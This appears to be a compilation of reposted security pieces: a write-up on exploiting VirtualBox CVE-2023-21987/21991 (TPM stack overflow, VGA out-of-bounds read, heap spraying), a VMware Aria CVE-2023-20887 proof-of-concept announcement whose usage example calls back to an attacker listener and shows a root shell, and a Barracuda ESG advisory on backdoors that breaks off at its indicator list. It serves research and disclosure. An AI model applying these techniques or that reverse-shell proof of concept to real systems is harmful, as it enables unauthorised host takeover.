Analysis of VirtualBox CVE-2023-21987 and CVE-2023-21991

Analysis of VirtualBox CVE-2023-21987 and CVE-2023-21991

Original text by qriousec

Introduction

Hi, I am Trung (xikhud). Last month, I joined Qrious Secure team as a new member, and my first target was to find and reproduce the security bugs that @bienpnn used at the Pwn2Own Vancouver 2023 to escape the VirtualBox VM.

Since VirtualBox is an open-source software, I can just download the source code from their homepage. The version of VirtualBox at the time of the Pwn2Own competition was 7.0.6.

Exploring VirtualBox

Building VirtualBox

The very first thing I did is to build the VirtualBox and to have a debugging environment. VirtualBox’s developers have published a very detail guide to build it. My setup is below:

  • Host: Windows 10
  • Guest: Windows 10. VirtualBox will be built on this machine.
  • Guest 2 (the guest inside the VirtualBox VM): LUbuntu 18.04.3

If you are new to VirtualBox exploitation, you may wonder why I need to install a nested VM. The reason is that VirtualBox contains both kernel mode and user mode components, so I have to install it inside a VM to debug its kernel things.

The official building guide offers using VS2010 or VS2019 to build VirtualBox, but you have to use VS2019 to build the version 7.0.6.

You can use any other operating system for Guest 2. I choose LUbuntu because it is lightweight. (I have a potato computer lol).

Learning VirtualBox source code

VirtualBox source code is large, I can’t just read all of them in a short amount of time. Instead, I find blog posts about pwning VirtualBox on Google and read them. These posts not only show how to exploit VirtualBox but also describe how VirtualBox works, its architecture and stuff like that. These are the very good write-ups that I also recommend you to read if you want to start learning VirtualBox exploitation:

The VirtualBox architecture is as follow (the picture is taken from Chen Nan’s slide at HITB2021)

The simple rule I learned is that when the guest wants to emulate a device, it send a request to the host’s kernel drivers (R0) first. The host’s kernel have two choices:

  • It can handle that request
  • Or it can return 
    VINF_XXX_R3_YYYY_ZZZZ
    . This value means that it doesn’t want to handle the request and the request will be handled by the host’s user mode components (R3).

The source code for R0 and R3 is usually in the same file, the only different thing is the preprocessors.

  • #define IN_RING3
     corresponds to R3 components
  • #define IN_RING0
     corresponds to R0 components
  • #define IN_RC
    : I don’t know what this is, maybe someone knows can tell me …

For example, let’s look at the code in the 

DevTpm.cpp
 file:

In the image above, when the R0 component receives this request, it will pass to R3 component. The return code (

rc
) is 
VINF_IOM_R3_MMIO_WRITE
. According to the source code comment, it is “Reason for leaving RZ: MMIO write”. There are other similar values: 
VINF_IOM_R3_MMIO_READ
VINF_IOM_R3_IOPORT_WRITE
VINF_IOM_R3_IOPORT_READ
, …

If you want to know more detail about VirtualBox architechture, I suggest you to read the slide by Chen Nan. You can also watch his video here.

After having a basic understanding about VirtualBox, the next thing I did is to find some attack vectors. Usually, with VirtualBox, the attack scenario will be an untrusted code running within the guest machine. It will communicate with the host to compromise it. There are two methods a guest OS can talk to the host:

  • Using memory mapped I/O
  • Using port I/O

These are usually the entry points of an attack, so I look at them first when auditing.

The memory mapped region can be created by these functions:

  • PDMDevHlpMmioCreateAndMap
  • PDMDevHlpMmioCreateExAndMap
  • ...

The IO port can be created by:

  • PDMDevHlpIoPortCreateFlagsAndMap
  • PDMDevHlpPCIIORegionCreateIo
  • PDMDevHlpPCIIORegionCreateMmio2Ex
  • ...

With memory mapped, we can use the 

mov
 or similar instructions to communicate with the host. Meanwhile, we use 
in
out
 instruction when we work with IO port.

Now I have more understanding about VirtualBox, I can start to look for bugs now. To reduce the time, @bienpnn gave me 2 hints:

  • The OOB write bug is in the TPM components
  • The OOB read bug is in the VGA components

Knowing that, I open the source code and read files in 

src/VBox/Devices/Security
 and 
src/VBox/Devices/Graphics
 folders.

The OOB write bug

At Pwn2Own, the TPM 2.0 is enabled. It is required to run Windows 11 inside VirtualBox. You will have to enable it manually in the VirtualBox GUI, if you don’t, then the exploit here won’t work.

The TPM module is initialized by the two functions 

tpmR3Construct
 (R3) and 
tpmRZConstruct
 (R0). Both functions register 
tpmMmioRead
 and 
tpmMmioWrite
 to handle read/write to memory mapped region.

    rc = PDMDevHlpMmioCreateAndMap(pDevIns, pThis->GCPhysMmio, TPM_MMIO_SIZE, tpmMmioWrite, tpmMmioRead,
                                   IOMMMIO_FLAGS_READ_PASSTHRU | IOMMMIO_FLAGS_WRITE_PASSTHRU,
                                   "TPM MMIO", &pThis->hMmio);

The memory region is at 
pThis->GCPhysMmio
, which is 
0xfed40000
 by default.
To confirm the communication works as expected, I put a (R0) breakpoint at 
VBoxDDR0!tpmMmioWrite
 and write a small C code to run inside the VirtualBox.
void *map_mmio(void *where, size_t length)
{
    int fd = open("/dev/mem", O_RDWR | O_SYNC);
    if (fd == -1) { /* error */ }
    void *addr = mmap(NULL, length, PROT_READ | PROT_WRITE, MAP_SHARED, fd, (off_t)where);
    if (addr == NULL) { /* error */ }
    return addr;
}

int main()
{
    volatile uint8_t* mmio_tpm = (uint8_t *)map_mmio((void *)0xfed40000, 0x5000);
    mmio_tpm[0x200] = 0xFF;
    return 0;
}

The breakpoint hit! It works. This is the signature of the 

tpmMmioWrite
 function:

static DECLCALLBACK(VBOXSTRICTRC) tpmMmioWrite(PPDMDEVINS pDevIns, void *pvUser, RTGCPHYS off, void const *pv, unsigned cb);

At the time the breakpoint hit, 

off
 is 
0x200
 (which is the offset from the start of the memory mapped buffer), 
cb
 is the number of byte to read, in this case it is 
0x1
 since we only write 1 byte, 
pv
 is the host buffer contains the values supplied by the guest OS, in this case it contains 
0xFF
 only. If we want to write more bytes, we can write it in C like this:

*(uint32_t*)(mmio_tpm + 0x200) = 0xFFAABBCC;

In assembly form, it will be something like this:

mov dword ptr [rdx], 0xFFAABBCC 

In this case, 

cb
 will be 
0x4
.

The 

tpmMmioWrite
 function looks fine, after confirming the is no bug in it, I look at 
tpmMmioRead
.

static DECLCALLBACK(VBOXSTRICTRC) tpmMmioRead(PPDMDEVINS pDevIns, void *pvUser, RTGCPHYS off, void *pv, unsigned cb)
{
    /* truncated */
    uint64_t u64;
    /* truncated */
        rc = tpmMmioFifoRead(pDevIns, pThis, pLoc, bLoc, uReg, &u64, cb);
    /* truncated */
    return rc;
}

static VBOXSTRICTRC tpmMmioFifoRead(PPDMDEVINS pDevIns, PDEVTPM pThis, PDEVTPMLOCALITY pLoc,
                                    uint8_t bLoc, uint32_t uReg, uint64_t *pu64, size_t cb)
{
    /* ... */
    /* Special path for the data buffer. */
    if (   (   (   uReg >= TPM_FIFO_LOCALITY_REG_DATA_FIFO
               && uReg < TPM_FIFO_LOCALITY_REG_DATA_FIFO + sizeof(uint32_t))
            || (   uReg >= TPM_FIFO_LOCALITY_REG_XDATA_FIFO
                && uReg < TPM_FIFO_LOCALITY_REG_XDATA_FIFO + sizeof(uint32_t)))
        && bLoc == pThis->bLoc
        && pThis->enmState == DEVTPMSTATE_CMD_COMPLETION)
    {
        if (pThis->offCmdResp <= pThis->cbCmdResp - cb)
        {
            memcpy(pu64, &pThis->abCmdResp[pThis->offCmdResp], cb);
            pThis->offCmdResp += (uint32_t)cb;
        }
        else
            memset(pu64, 0xff, cb);
        return VINF_SUCCESS;
    }
}

You can see that there is a branch of code that does a 

memcpy
 into the 
u64
, which is a stack variable of 
tpmMmioRead
 function. To be able to reach this branch, 
uReg
bLoc
 and 
pThis->enmState
 must have appropriate values. But don’t worry because we can control all of them, we can also control 
pThis->offCmdResp
 and 
pThis->abCmdResp
. There is no check to make sure 
cb &lt;= sizeof(uint64_t)
, so maybe there is a stack buffer overflow here? Now I have to find a way to make 
cb
 larger than 
sizeof(uint64_t)
 (8). I google and found that some AVX-512 instructions can read up to 512 bits (64 bytes) memory. Since my CPU doesn’t support AVX-512, I try AVX2 instead:

__m256 z = _mm256_load_ps((const float*)off);

Indeed, it works! 

cb
 is now 
0x20
 and I can overwrite 0x18 bytes after 
u64
 variable. But the is a problem: 
u64
 is behind the return address of 
VBoxDDR0!tpmMmioRead
. Let’s look at the stack when RIP is at the very first instruction of 
VBoxDDR0!tpmMmioRead
:

2: kd> dq @rsp
ffffbb80`814920a8  fffff804`d2432993 ffff8901`0ecc0000
ffffbb80`814920b8  000fffff`fffff000 ffff8901`0edc6760
ffffbb80`814920c8  fffff804`d243418b 00000000`00000020
ffffbb80`814920d8  fffff804`d2458b1d ffffe289`26bf7000
ffffbb80`814920e8  00000000`00000020 ffff8901`0ede4000
ffffbb80`814920f8  00000000`00000080 ffff8901`0ecc0000
ffffbb80`81492108  fffff804`d243313f ffffe289`26b87188
ffffbb80`81492118  fffff804`d2451c8b 00000000`fed40080

Remember that the return address is at 

0xffffbb80814920a8
. Now let’s run until RIP is at 
call VBoxDDR0!tpmMmioFifoRead
:

2: kd> dq @rsp
ffffbb80`81492060  ffff8901`0ecc0000 00000000`00000000
ffffbb80`81492070  00000000`00000060 fffff804`d253ba1b
ffffbb80`81492080  00000000`00000080 ffffbb80`814920b0 <-- pu64
ffffbb80`81492090  00000000`00000020 00000000`00000018
ffffbb80`814920a0  ffff8901`0ede4140 fffff804`d2432993 <-- R.A
ffffbb80`814920b0  ffff8901`0ecc0000 ffffe289`26b87188
ffffbb80`814920c0  00000000`00000080 fffff804`d243418b
ffffbb80`814920d0  00000000`00000020 fffff804`d2458b1d

Based on the x64 Windows calling convention, the 5th argument is at 

[rsp+0x28]
, so the address of 
u64
 is 
0xffffbb80814920b0
, which is behind the return address (
0xffffbb80814920a8
). Why does this happen? I don’t really know, but I guess this is some kind of compiler optimization. Let’s check 
tpmMmioRead
 in IDA:

unsigned __int64 pu64; // [rsp+50h] [rbp+8h] BYREF

The assembly code:

.text:000000014002BA10 000   mov     [rsp+10h], rbx
.text:000000014002BA15 000   mov     [rsp+18h], rsi
.text:000000014002BA1A 000   push    rdi
.text:000000014002BA1B 008   sub     rsp, 40h
.text:000000014002BA1F 048   mov     rdx, [rcx+10h]  ; pThis

pu64
 is at 
[rsp+0x50]
, but the function only allocate 0x48 bytes for the stack. Clearly, 
pu64
 is outside of the stack frame range. So in which function stack frame does this variable belong to? Well, it is right next to the return address, so it is in the shadow space. Turned out that, the shadow space is used to make debugging easier. But we are using the “Release” build, so it will use the shadow space as if it is a normal space. We can overwrite 0x18 bytes after the 
u64
 variable. Unfortunately, there is no data after 
u64
 so we can’t do anything. I’m stuck now. Maybe if my CPU supports AVX-512, I can do something? Until now, @bienpnn told me that there is an instruction which can read up to 512 bytes. It is 
fxrstor
, which is used to restore x87 FPU, MMX, XMM, and MXCSR state. Knowing this, I tried this code:

_fxrstor64((void*)off);

And then, VirtualBox.exe crashed! That’s good. But wait, why does it crash without first hitting the breakpoint at 

VBoxDDR0!tpmMmioRead
? Turned out that all the request with 
cb >= 0x80
 will be handled by R3 code. This is the comment in 
src\VBox\VMM\VMMAll\IOMAllMmioNew.cpp
:

/*
 * If someone is doing FXSAVE, FXRSTOR, XSAVE, XRSTOR or other stuff dealing with
 * large amounts of data, just go to ring-3 where we don't need to deal with partial
 * successes.  No chance any of these will be problematic read-modify-write stuff.
 *
 * Also drop back if the ring-0 registration entry isn't actually used.
 */

Let’s trigger this bug again. But this time we will set a breakpoint at 

VBoxDD!tpmMmioRead
 instead. And now I can see a stack buffer overflow.

Really nice. Now we have RIP controlled, but don’t know where to jump. We need a leak.

The OOB read bug

The OOB read bug is inside 

VGA
 module. There are a lot of files belong to this module, but I choose to read 
DevVGA.cpp
 first, since the name looks like the main file of VGA module. I look at the 2 construction functions to see which IO port or memory mapped is used. I found that the 
vgaMmioRead
 will handle the MMIO request, it will then call 
vga_mem_readb
. And inside this function, I found the code below (we can control 
addr
):

pThis->latch = !pThis->svga.fEnabled            ? ((uint32_t *)pThisCC->pbVRam)[addr]
             : addr < VMSVGA_VGA_FB_BACKUP_SIZE ? ((uint32_t *)pThisCC->svga.pbVgaFrameBufferR3)[addr] : UINT32_MAX;

pThis->svga.fEnabled
 is 
true
 so we only care about this line:

addr < VMSVGA_VGA_FB_BACKUP_SIZE ? ((uint32_t *)pThisCC->svga.pbVgaFrameBufferR3)[addr] : UINT32_MAX;

VMSVGA_VGA_FB_BACKUP_SIZE
 is the size of 
pThisCC->svga.pbVgaFrameBufferR3
. Maybe you can see what’s wrong here.

((uint32_t *)pThisCC->svga.pbVgaFrameBufferR3)[addr]

*(uint32_t *)(pThisCC->svga.pbVgaFrameBufferR3 + sizeof(uint32_t) * addr)
// note that the type of pThisCC->svga.pbVgaFrameBufferR3 is uint8_t[]

he code checks if 

addr &lt; VMSVGA_VGA_FB_BACKUP_SIZE
, but actually uses 
4 * addr
 for indexing. It means that we have an OOB read here. Untill now, I thought that it will be easy because with a leak and a stack buffer overflow, I would easily do a ROP chain. But I regret soon when I see that the heap layout is not static, it changes everytime I open a new VirtualBox process. The reason for this is because VirtualBox is a very complex software, so heap allocations are made everywhere, which changes the shape of the heap.

Exploitation

Now I need a reliable way to have a leak. For this, I will use heap spraying technique. So my plan is to poison the heap with a lot of objects that I control, and (hopefully) some of the objects will be right behind the 

pbVgaFrameBufferR3
 buffer so that I can use the OOB read to leak information. sauercl0ud team had already written a nice blog post about exploiting VirtualBox. Inside the post, they sprayed the heap with 
HGCMMsgCall
 objects, I will just use 
HGCMMsgCall
 too, because why not 😀 ?

What is HGCM?

HGCM is an abbreviation for “Host/Guest Communication Manager”. This is the module used for communication between the host and the guest. For example, they need to talk to each other in order to implement the “Shared Clipboard”, “Shared Folder”, “Drag and drop” services.

Here’s how it works. The guest inside VirtualBox will have to install additional drivers, a.k.a the guest additions. When the guest wants to use one of the service above, it will send a message to the host through IO port, the message is represented by the 

HGCMMsgCall
 struct.

0:035> dt VBoxC!HGCMMsgCall
   +0x000 __VFN_table : Ptr64 
   +0x008 m_cRefs          : Int4B
   +0x00c m_enmObjType     : HGCMOBJ_TYPE
   +0x010 m_u32Version     : Uint4B
   +0x014 m_u32Msg         : Uint4B
   +0x018 m_pThread        : Ptr64 HGCMThread
   +0x020 m_pfnCallback    : Ptr64     int 
   +0x028 m_pNext          : Ptr64 HGCMMsgCore
   +0x030 m_pPrev          : Ptr64 HGCMMsgCore
   +0x038 m_fu32Flags      : Uint4B
   +0x03c m_rcSend         : Int4B
   +0x040 pCmd             : Ptr64 VBOXHGCMCMD
   +0x048 pHGCMPort        : Ptr64 PDMIHGCMPORT
   +0x050 pcCounter        : Ptr64 Uint4B
   +0x058 u32ClientId      : Uint4B
   +0x05c u32Function      : Uint4B
   +0x060 cParms           : Uint4B
   +0x068 paParms          : Ptr64 VBOXHGCMSVCPARM
   +0x070 tsArrival        : Uint8B

This object is perfect because:

  • It has a 
    vtable
     pointer -> We can leak a library address
  • It has 
    m_pNext
     and 
    m_pPrev
    , which points to next and previous 
    HGCMMsgCall
     in a doubly linked list -> Also good, can be used to leak heap address.

Now I will spray the heap with a lot of 

HGCMMsgCall
. This code is just copied from Sauercl0ud blog:

void spray()
{
    int rc;
    for (int i = 0; i < 64; ++i)
    {
        int32_t clientId;
        rc = hgcm_connect("VBoxGuestPropSvc", &clientId);
        for (int j = 0; j < 16 - 1; ++j)
        {
            char pattern[0x70];
            char out[2];
            rc = wait_prop(clientId, pattern, strlen(pattern) + 1, out, sizeof(out)); // call VBoxGuestPropSvc HGCM service, this will allocate a HGCMMsgCall
        }
    }
}

After some observation, I realize that the 

vtable
 is usually 
0x7F??????AD90
. Only the 
?
 part is randomized, I will use this information to identify a 
HGCMMsgCall
 on the heap. My approach is simple: I just keep reading a qword (8 bytes) each time, called 
X
. I will then check if 
(X &amp; 0xFFFF) == 0xAD90
 and 
(X &gt;&gt; 40) == 0x7F
. If this is true, we likely to reach a 
HGCMMsgCall
, and X is the 
vtable
 pointer. To leak heap address, I will do like this (this idea is also taken from Sauercl0ud blog):

  • Find a 
    HGCMMsgCall
     on the heap. Let’s call this object 
    A
     and let’s call 
    a
     the offset from the 
    pbVgaFrameBufferR3
     buffer to this object.
  • Find another 
    HGCMMsgCall
    B
     and 
    b
     are the same as above, and 
    b &gt; a
    .
  • If 
    A-&gt;m_pNext - B-&gt;m_pPrev == b - a
    , then it’s likely that 
    A-&gt;m_pNext
     is the address of 
    B
    . It means that 
    A-&gt;m_pNext - b
     is the address of 
    pbVgaFrameBufferR3
     buffer.

Actually I don’t need a heap leak to make a ROP chain, only a DLL leak is enough. But I want to show you this method so that you can make a longer ROP chain in case you need it.

Now I have enough information to write an exploit.

Testing out the exploitation idea

I implement the idea above, and run the exploit for 20 times and not a single time success. That’s 0% of success rate, very bad. Most of the time, VirtualBox just crashes. I attached a debugger and ran the exploit again, the crash happened when trying to read an address that had not been mapped. Turned out that I could read up to 

0x180000
 bytes (1.5MB) after the 
pbVgaFrameBufferR3
 buffer, but most of the time there is only about ~ 
0xC0000
 bytes that had been mapped. Another crash I found is when the exploit was trying to read an address inside a guard page. Another problem I had is that the exploit run really slow, because the OOB bug only lets me read 1 byte at a time. I need to improve the speed of the exploit as well.

Parsing heap header to avoid unmmaped pages and increase speed

Until now, I have a new idea: parsing the heap chunk headers on the heap to gain more information. First thing I want to do is to read some information about a chunk, for example, the size of the chunk, is it freed or in used? If I can do this, maybe I will be able to skip some unnecessary chunks. To make this idea come true, I have to learn some Windows heap internal. I recommend you to read these:

Basically, a heap chunk is represented by 

_HEAP_ENTRY
 structure:

0:035> dt _HEAP_ENTRY
ntdll!_HEAP_ENTRY
    ...
   +0x008 Size             : Uint2B
   +0x00a Flags            : UChar
    ...
   +0x00c PreviousSize     : Uint2B
    ...

Size
 is the size of the chunk (include the header itself), 
PreviousSize
 is the size of the previous chunk (in memory), and 
Flags
 contains extra information about a chunk, for example: is it free or in used.

Actually 

Size
 (and 
PreviousSize
) is the size of a chunk in blocks, not in bytes. 1 block is 16 bytes in length.

Parsing heap header is easy. 16 bytes after 

pbVgaFrameBufferR3
 is the chunk header of a chunk, so I can read it, get the 
Size
 and just do it again … But there is a problem: the chunk header is encoded, it is xorred with 
_HEAP->Encoding
. I will give you an example.

0:042> !heap -i 26855e40000             
Heap context set to the heap 0x0000026855e40000
0:042> db 0000026859f1f010 L0x10
00000268`59f1f010  0c 00 02 02 2e 2e 00 00-dd e0 1a 38 cd be b2 10  ...........8....
0:042> !heap -i 0000026859f1f010 
Detailed information for block entry 0000026859f1f010
Assumed heap       : 0x0000026855e40000 (Use !heap -i NewHeapHandle to change)
Header content     : 0x381AE0DD 0x10B2BECD (decoded : 0x08010801 0x10B28201)
Owning segment     : 0x00000268593f0000 (offset b2)
Block flags        : 0x1 (busy )
Total block size   : 0x801 units (0x8010 bytes)
Requested size     : 0x8000 bytes (unused 0x10 bytes)
Previous block size: 0x8201 units (0x82010 bytes)
Block CRC          : OK - 0x8  
Previous block     : 0x0000026859e9d000
Next block         : 0x0000026859f27020

The output of 

!heap -i
 said that the header content is 
0x381AE0DD 0x10B2BECD
, but after decoded it is 
0x08010801 0x10B28201
. Let’s confirm this

0:042> db 0000026859f1f010 L0x10
00000268`59f1f010  0c 00 02 02 2e 2e 00 00-dd e0 1a 38 cd be b2 10  ...........8....
0:042> dt _HEAP
ntdll!_HEAP
   +0x000 Segment          : _HEAP_SEGMENT
    ...
   +0x080 Encoding         : _HEAP_ENTRY // <-- The key to decode
    ...
0:042> dq 26855e40000+0x80 L2
00000268`55e40080  00000000`00000000 00003ccc`301be8dc

So the key is 

0x00003ccc301be8dc
0x00003ccc301be8dc ^ 0x10b2becd381ae0dd = 0x10b2820108010801
, which is exactly what shown in 
!heap -i
 command.

So to parse a chunk header, we need to leak the 

_HEAP->Encoding
. I can’t not directly leak it but I have an idea to calculate it. 
pbVgaFrameBufferR3
 has the size of 
0x80010
 bytes (include the header), so the chunk right behind it (let’s call this chunk 
A
) must have 
PreviousSize
 equals to 
0x8001
. Knowing this, I can calculate 2 bytes key to decode 
PreviousSize
.

KeyToDecodePreviousSize = A->PreviousSize ^ 0x8001

Next, I find another chunk after chunk 

A
, let’s call this chunk 
B
B
 is likely to be a valid chunk if:

(B->PreviousSize ^ KeyToDecodePreviousSize) << 4 == Distance between A and B

B->PreviousSize ^ KeyToDecodePreviousSize
 is also the value of 
A->Size ^ KeyToDecodeSize
, so:

KeyToDecodeSize = B->PreviousSize ^ KeyToDecodePreviousSize ^ A->Size

Now I am able to decode 

Size
 and 
PreviousSize
. What about the 
Flags
? I don’t know a good way to decode it, so I just run VirtualBox multiple times and observe that most of the time chunk 
A
 is in used. So if any other chunk has the LSB bit of 
Flags
 equals to the LSB bit of 
A-&gt;Flags
, then it is also in used and vice versa. With this informaton, I can walk the heap easily, the algorithm looks like this:

uint32_t curOffset = 0x80000;
while (curOffset < 0x200000) { // 0x200000 is the maximum we can touch
    HEAP_ENTRY hE;
    readHeapEntry(curOffset, &hE);
    if (isInUsed(&hE))
        findSprayedObjects(curOffset, &hE);
    curOffset += ((hE.Size ^ KeyToDecodeSize) << 4); // 1 block is 16 bytes
}

Now my exploit runs a lot faster, also the success rate is increased a little. But sometime the exploit still crashed VirtualBox. I attach Windbg and see that it was trying to access a guard page, and this guard page is inside an in-used chunk. After a few days of researching, I finally knew that chunk was a 

UserBlocks
.

How does LFH work and what is a 
UserBlocks
?

Quoted from Microsoft:

Heap fragmentation is a state in which available memory is broken into small, noncontiguous blocks. When a heap is fragmented, memory allocation can fail even when the total available memory in the heap is enough to satisfy a request, because no single block of memory is large enough. The low-fragmentation heap (LFH) helps to reduce heap fragmentation. The LFH is not a separate heap. Instead, it is a policy that applications can enable for their heaps. When the LFH is enabled, the system allocates memory in certain predetermined sizes

When an application makes more than 17 allocations of the same size, the LFH will be turned on (for that size only). We spray a lot of objects (more than 17), so they will all be served by the LFH. Basically this is how LFH works:

  • A big chunk will be allocated, this is a 
    UserBlocks
     struct. A 
    UserBlocks
     contains some metadata and a lot of small chunks.
  • Any heap allocation after that will return a (freed) small chunk in the 
    UserBlocks
    .

UserBlocks
 is represented by a 
_HEAP_USERDATA_HEADER
 struct:

0:042> dt _HEAP_USERDATA_HEADER
ntdll!_HEAP_USERDATA_HEADER
   +0x000 SFreeListEntry   : _SINGLE_LIST_ENTRY
   +0x000 SubSegment       : Ptr64 _HEAP_SUBSEGMENT
   +0x008 Reserved         : Ptr64 Void
   +0x010 SizeIndexAndPadding : Uint4B
   +0x010 SizeIndex        : UChar
   +0x011 GuardPagePresent : UChar
   +0x012 PaddingBytes     : Uint2B
   +0x014 Signature        : Uint4B
   +0x018 EncodedOffsets   : _HEAP_USERDATA_OFFSETS
   +0x020 BusyBitmap       : _RTL_BITMAP_EX
   +0x030 BitmapData       : [1] Uint8B

There is 2 important things to note here:

  • The 
    _HEAP_USERDATA_HEADER
     is not encoded like the 
    HEAP_ENTRY
    . A 
    UserBlocks
     is also a regullar chunk, so it is in the “user data” part of another 
    HEAP_ENTRY
    .
  • Signature
     is always 
    0xF0E0D0C0
    , so we can easily find it in the heap.
  • GuardPagePresent
    : if this is non zero, the 
    UserBlocks
     has a page guard at the end, so we can skip 
    0x1000
     bytes at the end, preventing crashes.
  • BusyBitmap
     contains the address of 
    BitmapData
    . This can be used as a reliable way to leak heap address too

Knowing that all the 

HGCMMsgCall
 sprayed by us will be served by LFH, I will only find them in a 
UserBlocks
. This makes the exploit run a lot of faster than the first exploit I made.

More success rate, more speed

I also noted that each time I want to send a HGCM message, I have to create a 

HGCMClient
. Since there are many 
HGCMClient
s being allocated when spraying, I also look for their 
vtable
 pointer.

One more thing is that every chunk address will have to be the multiple of 

0x10
, so I only read qwords at these locations to find 
vtable
. This will also increase the speed of my exploit.

Conclusion

I would like to give a special thanks to my mentor @bienpnn, who was actively helping me throughout the project. This is my first time exploiting a real Windows software so it is really fun. After this project, I learned more about Windows heap internal, how a hypervisor works, how to debug Windows kernel and a ton of other knowledge. I hope this post can help you if you are about to target VirtualBox, and see you in another blog post!

CVE-2023-20887 VMWare Aria Operations for Networks (vRealize Network Insight) unauthenticated RCE

CVE-2023-20887 VMWare Aria Operations for Networks (vRealize Network Insight) unauthenticated RCE

Original text by summoning.team

🔥 PoC https://github.com/sinsinology/CVE-2023-20887 for CVE-2023-20887 VMWare Aria Operations for Networks (vRealize Network Insight) unauthenticated RCE
This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed.

🔖RCA here https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/

Usage:

$python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337
VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) Starting handler
(+) Received connection from 192.168.116.100
(+) pop thy shell! (it's ready)
$ sudo bash
$ id
uid=0(root) gid=0(root) groups=0(root)
$ hostname
vrni-platform-release

Barracuda Email Security Gateway Appliance (ESG) Vulnerability

Barracuda Email Security Gateway Appliance (ESG) Vulnerability

Original text by Barracuda

UNE 6th, 2023:

ACTION NOTICE: Impacted ESG appliances must be immediately replaced regardless of patch version level. If you have not replaced your appliance after receiving notice in your UI, contact support now (support@barracuda.com).  

Barracuda’s remediation recommendation at this time is full replacement of the impacted ESG. 

JUNE 1st, 2023:

Preliminary Summary of Key Findings

Document History

Version/DateNotes
1.0: May 30, 2023Initial Document
1.1 : June 1, 2023Additional IOCs and rules included

Barracuda Networks’ priorities throughout this incident have been transparency and to use this as an opportunity to strengthen our policies, practices, and technology to further protect against future attacks. Although our investigation is ongoing, the purpose of this document is to share preliminary findings, provide the known Indicators of Compromise (IOCs), and share YARA rules to aid our customers in their investigations, including with respect to their own environments.

Timeline

  • On May 18, 2023, Barracuda was alerted to anomalous traffic originating from Barracuda Email Security Gateway (ESG) appliances.
  • On May 18, 2023, Barracuda engaged Mandiant, leading global cyber security experts, to assist in the investigation.
  • On May 19, 2023, Barracuda identified a vulnerability (CVE-2023-28681) in our Email Security Gateway appliance (ESG).
  • On May 20, 2023, a security patch to remediate the vulnerability was applied to all ESG appliances worldwide.
  • On May 21, 2023, a script was deployed to all impacted appliances to contain the incident and counter unauthorized access methods.
  • A series of security patches are being deployed to all appliances in furtherance of our containment strategy.

Key Findings

While the investigation is still on-going, Barracuda has concluded the following:

  • The vulnerability existed in a module which initially screens the attachments of incoming emails. No other Barracuda products, including our SaaS email security services, were subject to the vulnerability identified.
  • Earliest identified evidence of exploitation of CVE-2023-2868 is currently October 2022.
  • Barracuda identified that CVE-2023-2868 was utilized to obtain unauthorized access to a subset of ESG appliances.
  • Malware was identified on a subset of appliances allowing for persistent backdoor access.
  • Evidence of data exfiltration was identified on a subset of impacted appliances..

Users whose appliances we believe were impacted have been notified via the ESG user interface of actions to take. Barracuda has also reached out to these specific customers. Additional customers may be identified in the course of the investigation.

CVE-2023-2868

On May 19, 2023, Barracuda Networks identified a remote command injection vulnerability (CVE-2023-2868) present in the Barracuda Email Security Gateway (appliance form factor only) versions 5.1.3.001-9.2.0.006. The vulnerability stemmed from incomplete input validation of user supplied .tar files as it pertains to the names of the files contained within the archive. Consequently, a remote attacker could format file names in a particular manner that would result in remotely executing a system command through Perl’s qx operator with the privileges of the Email Security Gateway product.

Barracuda’s investigation to date has determined that a third party utilized the technique described above to gain unauthorized access to a subset of ESG appliances.

Malware

This section details the malware that has been identified to date, and to assist in tracking, codenames for the malware have been assigned.

SALTWATER

SALTWATER is a trojanized module for the Barracuda SMTP daemon (bsmtpd) that contains backdoor functionality. The capabilities of SALTWATER include the ability to upload or download arbitrary files, execute commands, as well as proxy and tunneling capabilities.

Identified at path: /home/product/code/firmware/current/lib/smtp/modules on a subset of ESG appliances.

The backdoor is implemented using hooks on the send, recv, close syscalls and amounts to five components, most of which are referred to as “Channels” within the binary. In addition to providing proxying capabilities, these components exhibit backdoor functionality.  The five (5) channels can be seen in the list below.

  • DownloadChannel
  • UploadChannel
  • ProxyChannel
  • ShellChannel
  • TunnelArgs

Mandiant is still analyzing SALTWATER to determine if it overlaps with any other known malware families.

Table 1 below provides the file metadata related to a SALTWATER variant.

NameSHA256
mod_udp.so1c6cad0ed66cf8fd438974e1eac0bc6dd9119f84892930cb71cb56a5e985f0a4
MD5File TypeSize (Bytes)
827d507aa3bde0ef903ca5dec60cdec8ELF x861,879,643

Table 1: SALTWATER variant metadata

SEASPY

SEASPY is an x64 ELF persistence backdoor that poses as a legitimate Barracuda Networks service and establishes itself as a PCAP filter, specifically monitoring traffic on port 25 (SMTP) and port 587. SEASPY contains backdoor functionality that is activated by a «magic packet».

Identified at path: /sbin/ on a subset of ESG appliances.

Mandiant analysis has identified code overlap between SEASPY and cd00r, a publicly available backdoor.

Table 2 below provides the file metadata related to a SEASPY variant.

NameSHA256
BarracudaMailService3f26a13f023ad0dcd7f2aa4e7771bba74910ee227b4b36ff72edc5f07336f115
MD5File TypeSize (Bytes)
4ca4f582418b2cc0626700511a6315c0ELF x642,924,217

Table 2: SEASPY variant metadata

SEASIDE

SEASIDE is a Lua based module for the Barracuda SMTP daemon (bsmtpd) that monitors SMTP HELO/EHLO commands to receive a command and control (C2) IP address and port which it passes as arguments to an external binary that establishes a reverse shell.

Table 3 below provides the file metadata related to a SEASIDE.

NameSHA256
mod_require_helo.luafa8996766ae347ddcbbd1818fe3a878272653601a347d76ea3d5dfc227cd0bc8
MD5File TypeSize (Bytes)
cd2813f0260d63ad5adf0446253c2172Lua module2,724

Table 3: SEASIDE metadata

Recommendations For Impacted Customers

  1. Ensure your ESG appliance is receiving and applying updates, definitions, and security patches from Barracuda. Contact Barracuda support (support@barracuda.com) to validate if the appliance is up to date.
  2. Discontinue the use of the compromised ESG appliance and contact Barracuda support (support@barracuda.com) to obtain a new ESG virtual or hardware appliance.
  3. Rotate any applicable credentials connected to the ESG appliance:
    o  Any connected LDAP/AD
    o  Barracuda Cloud Control
    o  FTP Server
    o  SMB
    o  Any private TLS certificates
  4. Review your network logs for any of the IOCs listed below and any unknown IPs. Contact compliance@barracuda.com if any are identified.

To support customers in the investigations of their environments, we are providing a list of all endpoint and network indicators observed over the course of the investigation to date. We have also developed a series of YARA rules that can be found in the section below.

Endpoint IOCs

